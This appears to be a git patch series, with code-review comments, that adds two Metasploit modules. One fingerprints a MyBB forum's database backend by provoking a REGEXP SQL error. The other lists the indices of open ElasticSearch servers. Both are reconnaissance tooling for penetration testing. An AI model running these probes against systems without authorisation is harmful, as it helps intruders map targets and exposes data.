From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 14 Feb 2014 13:12:43 -0800 Subject: [PATCH 01/47] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases. --- modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB new file mode 100644 index 0000000000..a39fd38c09 --- /dev/null +++ b/modules/exploits/multi/http/myBB_GetTypeDB 
@@ -0,0 +1,118 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MyBB type database extractor', + 'Description' => %q{ + This module exploits vulnerability in MyBB. + Provide type of database in forum + This affects versions <= 1.6.12 + }, + 'Author' => + [ + 'Arthur Karmanovskii', # Discovery + 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ '0 - days', '2014-13-02' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) + ], self.class) + end + + def check + begin + print_status("URI: #{datastore['TARGETURI']}") + uri = normalize_uri(target_uri.path, '/index.php') + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Keep-Alive', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end + + if res.code != 200 + print_error("Unable to query to host") + return CheckCode::Unknown + end + + php_version = res['X-Powered-By'] + if php_version + print_good("PHP Version: #{php_version}") + else + print_status("Unknown PHP Version") + return CheckCode::Unknown + end + + _Version_server = res['Server'] + if _Version_server + print_good("Server Version: 
#{_Version_server}") + else + print_status("Unknown Server Version") + return CheckCode::Unknown + end + return CheckCode::Detected + end + + def exploit + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else response.body.match(/Member List/) + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + + end +end + From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 10:21:05 -0800 Subject: [PATCH 02/47] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module. --- .../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%) diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb similarity index 100% rename from modules/exploits/multi/http/myBB_GetTypeDB rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb 
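Review bot: In `check`, `res` is nil when send_request_raw times out, and `if res.code != 200` runs outside the bare `rescue`, so a quiet timeout raises NoMethodError instead of returning `CheckCode::Unknown`; add `return CheckCode::Unknown if res.nil?` before the status test. Both requests send `'Accept-Encoding' => 'gzip, deflate'` and then regex-match `response.body`; unless the HTTP client inflates compressed bodies (I do not believe it does), a server that honours the header makes every signature miss and the module prints the fallback message, so that header should go. `else response.body.match(/Member List/)` in `exploit` is an `else` followed by a discarded expression rather than a condition; `elsif` was meant.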
From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 03/47] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 04/47] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
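Review bot: `Rank = ExcellentRanking` stays as context right under the new `class Metasploit3 < Msf::Auxiliary` line, but module rank is documented as a measure of exploit reliability and auxiliary modules conventionally omit it; drop the line while the base class is being changed. The exploit-only info keys further down the file ('Privileged', 'Platform', 'Arch', 'Targets', 'DefaultTarget', outside this hunk) are in the same situation.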
@@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 05/47] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) 
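Review bot: The bare `else` introduced in hunk @@ -109,7 fixes the dangling expression, but the message that branch prints, "Database MySQL or this is not forum MyBB or unknown Database", asserts more than the module observed: a PostgreSQL install with a non-default table prefix lands here too, because the PostgreSQL signature just above the hunk hardcodes `mybb_users`. Rewording it to report what was seen, e.g. `print_status("No REGEXP error in response: MySQL, a non-MyBB site, or a non-default table prefix")`, keeps the output honest. The `Exploit::CheckCode` changes in the other three hunks are fine as written.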
diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Arthur Karmanovskii', # Discovery - 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ '0 - days', '2014-13-02' ] + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], 'Privileged' => false, 'Platform' => ['php'], @@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - From b032f2c2700f02ec1d7e1e4c9c49ce697118f2d9 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:31:24 -0400 Subject: [PATCH 06/47] Added Elastic Search Enum --- .../scanner/elasticsearch/es_enum.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/es_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb new file mode 100644 index 0000000000..ed41a17cc2 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb 
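Review bot: The only entry left in 'References' (hunk @@ -15,13) is the URL of this pull request, which is circular: a reference should point at the vendor advisory, bug tracker entry or CVE describing the REGEXP behaviour the module relies on, and if none exists an empty list is more honest than a self-reference. The 'Description' context above it still says "This module exploits vulnerability in MyBB" although the module only fingerprints the database backend; `Determines which database backend a MyBB forum uses from the error produced by an unsupported REGEXP operator` describes it. The copied header's `http//metasploit.com/download` is missing its colon.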
@@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => 'Send a request to enumerate ElasticSearch indices', + 'Author' => ['Silas Cutler MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9200) + ] + ) + + end + + def run_host(target_host) + + begin + res = send_request_raw({ + 'uri' => '/_aliases', + 'method' => 'GET', + 'version' => '1.0', + }, 10) + + if res.nil? + print_error("No response for #{target_host}") + return nil + end + + begin + temp = JSON.parse(res.body) + rescue JSON::ParserError + print_error("Unable to parse JSON") + return + end + + + if (res.code == 200) + temp.each do |index| + print_good("Index : " + index[0]) + end + end + + if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 + path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + print_status("Results saved to #{path}") + else + print_error("Failed to save the result") + end + + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 975c2adbadf5f4c99d2d23cc4b9982cd107c6550 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:34:45 -0400 Subject: [PATCH 07/47] Fixed spaces issues --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index ed41a17cc2..a67961323d 100644 
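Review bot: The two trailing `rescue` clauses in `run_host` swallow connection and timeout errors with no output, so an unreachable or filtered host is indistinguishable from a host with no indices; bind and log them, e.g. `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e` followed by `vprint_error("#{target_host} - #{e.class}: #{e.message}")`. `JSON.parse(res.body)` runs before `res.code` is examined, so a non-200 HTML error page is reported as "Unable to parse JSON" rather than as an HTTP failure; test the status first. Index names come straight from the server and are echoed with `print_good("Index : " + index[0])`; a hostile service can put terminal control sequences in them, so `index[0].inspect` or a printable filter is safer when the target is untrusted.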
--- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) register_options( - [ + [ Opt::RPORT(9200) ] ) @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res.code == 200) temp.each do |index| - print_good("Index : " + index[0]) + print_good("Index : " + index[0]) end end From ad4c3544604ad9716c518393c51a41d9f981c29f Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 17 Mar 2014 13:38:33 -0400 Subject: [PATCH 08/47] Update es_enum.rb Corrected changes from dev module --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a67961323d..d74af4984b 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") print_status("Results saved to #{path}") else print_error("Failed to save the result") From d36159710409c6d07e312f0980f506845662d5f4 Mon Sep 17 00:00:00 2001 From: silascutler Date: Tue, 18 Mar 2014 09:20:04 -0400 Subject: [PATCH 09/47] Update es_enum.rb --- .../scanner/elasticsearch/es_enum.rb | 48 +++++++------------ 1 file changed, 18 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index d74af4984b..a44eea1cee 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb 
@@ -3,35 +3,32 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient - # Scanner mixin should be near last include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => 'Send a request to enumerate ElasticSearch indices', - 'Author' => ['Silas Cutler MSF_LICENSE - ) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Author' => + [ + 'Silas Cutler ' + ], + 'License' => MSF_LICENSE + )) + register_options( [ Opt::RPORT(9200) - ] - ) - + ], self.class) end - def run_host(target_host) - + def run_host(ip) begin res = send_request_raw({ 'uri' => '/_aliases', @@ -39,33 +36,24 @@ class Metasploit3 < Msf::Auxiliary 'version' => '1.0', }, 10) - if res.nil? - print_error("No response for #{target_host}") - return nil - end - begin - temp = JSON.parse(res.body) + json_body = JSON.parse(res.body) rescue JSON::ParserError print_error("Unable to parse JSON") return end - - if (res.code == 200) - temp.each do |index| + if res and res.code == 200 and res.body.length > 0 + json_body.each do |index| print_good("Index : " + index[0]) end - end - if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") - print_status("Results saved to #{path}") + path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") + print_good("Results saved to #{path}") else print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end 
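Review bot: Removing the `if res.nil?` guard (hunk @@ -39,33) leaves `JSON.parse(res.body)` as the first use of `res`; send_request_raw returns nil on a read timeout, and the resulting NoMethodError is caught neither by `rescue JSON::ParserError` nor by the Rex rescues at the end, so one slow host aborts run_host for that target with a traceback. Restore `return if res.nil?` (optionally with a vprint_error) before the parse, and move the `res.code == 200` test ahead of the parse as well, since `if res and res.code == 200 and res.body.length > 0` now only runs after a successful parse; the `res and` part of that condition is then redundant.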
From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 10/47] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking 
@@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: 
#{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 11/47] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null 
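Review bot: The rewritten `check` builds its own `Rex::Proto::Http::Client` from `datastore['RHOST']`/`RPORT` instead of calling the mixin's `send_request_raw`, so SSL, VHOST and proxy options are ignored, nothing calls `nclient.close`, and the second argument to `send_recv` — the read timeout in seconds, if I read the Rex API correctly — is 1024, so an unresponsive host can stall the check for about seventeen minutes. `res` is then used without a nil check, and `rescue RuntimeError` catches neither the resulting NoMethodError nor the Rex connection errors (IOError subclasses, as far as I recall), so those propagate out of `check`; the `if (req)` else-branch also looks dead, since request_raw returns a request object. `res = send_request_raw('uri' => uri, 'method' => 'GET')` with `return Exploit::CheckCode::Unknown if res.nil?` and `rescue ::Rex::ConnectionError, ::Timeout::Error => err` addresses all of it. The same code is carried verbatim into mybb_get_type_db.rb in the next commit.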
@@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return 
Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end 
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb new file mode 100644 index 0000000000..e20d863f2d --- /dev/null +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Determinant Databases MyBB ', + 'Description' => %q{ + Determine the database in the forum. + This affects versions <= 1.6.12 + }, + 'Author' => + [ + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) + ], self.class) + end + + def check + begin + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? 
